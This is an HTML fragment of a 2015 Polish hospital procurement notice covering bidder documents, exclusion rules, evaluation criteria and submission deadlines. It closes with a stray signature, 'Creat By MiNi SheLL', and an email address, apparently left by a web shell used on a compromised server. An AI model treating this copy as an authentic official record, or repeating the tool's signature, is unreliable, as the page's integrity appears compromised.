<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.3	Dokumenty podmiotów zagranicznych:
b)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 7.3 a), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentowania wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
7.4	Pozostałe wymagane od Wykonawców dokumenty:
a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, s.c.) każdy oddzielnie przedstawi dokumenty wykazujące brak podstaw do wykluczeni oraz listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informację o tym, że nie należy do grupy kapitałowej. Ponadto do oferty dołączą pełnomocnictwo pełnomocnika lub lidera upoważniające do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
b)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy, wypełniając załącznik nr 6 do SIWZ. Brak informacji, o której mowa w zdaniu poprzednim będzie uznany za stwierdzenie samodzielnego wykonania zamówienia przez Wykonawcę, który złoży ofertę.
c)	W przypadku gdy wykonawca powołuje się na zasoby innych podmiotów, w celu wykazania spełnienia warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy na zasadach określonych w art. 26 ust. 2 b ustawy Zamawiający żąda podania przez Wykonawcę nazw tych podwykonawców (firm), zgodnie z art. 36 b ust. 1 ustawy wypełniając załącznik nr 3 pkt. 5.
d)	Na podstawie art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
e)	Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2 b ustawy odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
f)	     W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
g)	Wykonawca składa dokumenty dotyczące przynależności do tej samej grupy kapitałowej tj. listę podmiotów należących do tej samej grupy kapitałowej (o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp) w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów, albo informację o tym, że wykonawca nie należy do grupy kapitałowej - wzór oświadczenia stanowi załącznik nr 5 do SIWZ.
7.5	Zamawiający wykluczy z postępowania Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.
7.6	Zamawiający nie wykluczy z postępowania Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków lub zobowiązał się do ich naprawienia.
7.7	Ocena warunków udziału w postępowaniu dokonana będzie na podstawie dostarczonych przez Wykonawcę oświadczeń i dokumentów ujętych w pkt. 7 SIWZ powyżej według zasady spełnia/nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas naprawy zgłoszonych błędów - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi w głównych postanowieniach umowy stanowiących załącznik nr 9 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jurasza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Uniwersytecki nr 1 im. dr. A. Jurasza w Bydgoszczy, 85-094 Bydgoszcz, ul. M. Skłodowskiej - Curie 9 Dział Logistyki i Zamówień Publicznych, pokój nr 13 w budynku A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2015 godzina 10:15, miejsce: Kancelaria Główna Szpitala Uniwersyteckiego nr 1 im. dr. A. Jurasza w Bydgoszczy, 85-094 Bydgoszcz, ul. M. Skłodowskiej-Curie 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com